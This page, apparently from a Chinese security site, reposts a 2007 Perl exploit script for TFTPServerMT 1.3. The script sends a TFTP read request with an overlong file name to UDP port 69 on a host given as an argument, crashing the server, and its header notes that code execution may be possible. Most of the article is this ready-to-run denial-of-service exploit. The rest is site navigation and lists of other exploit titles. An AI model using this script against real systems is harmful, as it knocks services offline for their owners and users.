首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TFTP Server 1.3 Remote Buffer Overflow Denial of Service Exploit
来源:http://sourceforge.net/project/showfiles.php?group 作者:Umesh 发布时间:2007-03-13  
#################################################################################################################
#    Name : TFTPServerMT v 1.3 Remote Buffer Overflow Dos Exploit

#   Author: Umesh Wanve
#
#     Date: 01-03-2007
#
#   Desc: This is latest version of TFTP server. EDI gets overwritten at 246. So code execution may be possible
#         Someone can better write it. Sending a long file name on the vulnerable server can crash the server.
#
#   Details: http://sourceforge.net/project/showfiles.php?group_id=162512
#
###############################################################################################################
#!/usr/bin/perl

use IO::Socket;
#use strict;


my($read_request)="\x00\x01";                                                # GET or PUT request

my($tailer)="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";                      #transporting mode (eg. netascii)  

my($pad)="\x90" x 279;                               



if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "69",

Proto    => "UDP"))
{
               

                 print $socket "\x00\x01".("A"x242)."BBBB".$tailer;

                 sleep(1);
           
              
                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·News Bin Pro 4.32 Article Grab
·PHP 5.2.0 ext/filter Space Tri
·NewsReactor 20070220 Article G
·NewsReactor 20070220 Article G
·JGBBS 3.0beta1 (search.asp aut
·MS Windows DCE-RPC svcctl Chan
·Dayfox Blog 4 (postpost.php) R
·PHP <= 5.2.0 ext/filter FDF Po
·WSN Guest 1.21 (comments.php i
·Oracle 10g (PROCESS_DUP_HANDLE
·ZomPlog <= 3.7.6 Local File In
·PostNuke Module phgstats 0.5 (
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved